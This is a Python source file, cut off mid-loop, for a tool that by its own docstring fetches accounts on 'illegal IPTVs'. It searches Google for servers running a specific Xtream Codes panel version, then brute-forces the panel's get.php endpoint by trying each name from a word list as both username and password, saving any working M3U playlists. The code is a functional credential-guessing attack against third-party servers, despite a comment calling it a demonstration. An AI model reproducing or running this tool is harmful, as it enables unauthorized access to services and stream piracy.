import urllib2
import google
import time
import pyprind
import os
import random
from urlparse import urlparse
"""Crawler
Class that handles the crawling process that fetch accounts on illegal IPTVs
Authors:
Claudio Ludovico (@Ludo237)
Pinperepette (@Pinperepette)
Arm4x (@Arm4x)
"""
class Crawler(object):
    # version
    version = "1.2.3"
    # default output directory
    outputDir = "output"
    # default language directory
    languageDir = "languages"
    # query string used to exploit the CMS
    basicString = "/get.php?username=%s&password=%s&type=m3u&output=mpegts"
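    # e.g. with the hypothetical candidate name "mario", basicString % ("mario", "mario")
    # expands to "/get.php?username=mario&password=mario&type=m3u&output=mpegts"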
    # string used to search for the CMS
    searchString = "Xtream Codes v1.0.59.5"
    def __init__(self, language = "it"):
        """Default constructor

        Keyword arguments:
        language -- selects which names file to use (default "it")
        """
        self.language = language.lower()
        self.parsedUrls = []
        self.foundedAccounts = 0
    def change_language(self, language = "it"):
        """Set the language used to brute force names

        Keyword arguments:
        language -- selects which names file to use (default "it")

        Return:
        boolean -- True if the language file exists, otherwise False
        """
        if os.path.isfile(self.languageDir + "/" + language + ".txt"):
            self.language = language
            return True
        else:
            return False
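    # e.g. crawler.change_language("en") returns True only if "languages/en.txt"
    # exists ("en" is just an illustrative language code here)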
    def search_links(self):
        """Collect the first 30 links from a Web search

        The limit is set to 30 links because this script serves as a demonstration
        and is not intended to be used for personal purposes.
        """
        for url in google.search(self.searchString, num=30, stop=30):
            parsed = urlparse(url)
            self.parsedUrls.append(parsed.scheme + "://" + parsed.netloc)
    def search_accounts(self, url = None):
        """Search Accounts

        This is the core method. It crawls the given URL for any possible accounts.
        If any are found, a new directory named after the site is created under
        /output, and every account is saved as a .m3u file. Use VLC to open these
        files.

        Keyword arguments:
        url -- a URL from the fetched list (default None)

        Return:
        string -- the status of the crawling session
        """
        if not self.parsedUrls:
            return "You must fetch some URLs first"
        try:
            if not url:
                url = random.choice(self.parsedUrls)
            fileName = self.languageDir + "/" + self.language + ".txt"
            fileLength = self.file_length(fileName)
            progressBar = pyprind.ProgBar(fileLength, title = "Fetching accounts from " + url + ", this might take a while.", stream = 1, monitor = True)
            foundedAccounts = 0
            with open(fileName) as f:
                rows = f.readlines()
                for row in rows:
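                    # Each candidate name from the language file is tried as both
                    # the username and the password of the request below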
                    # Do the injection against the current url using the exploit that we know
                    opener = urllib2.build_opener()
                    opener.addheaders = [('User-agent', 'Mozilla/5.0')]
                    response = opener.open(url + self.basicString % (row.strip(), row.strip()))
                    fetched = response.read()
                    # Update the progress bar in order to give the user a nice
                    # indication of the time left
                    fileLength = fileLength - 1
                    progressBar.update()
                    # If the fetched content is not empty
                    # we build the dedicated .m3u file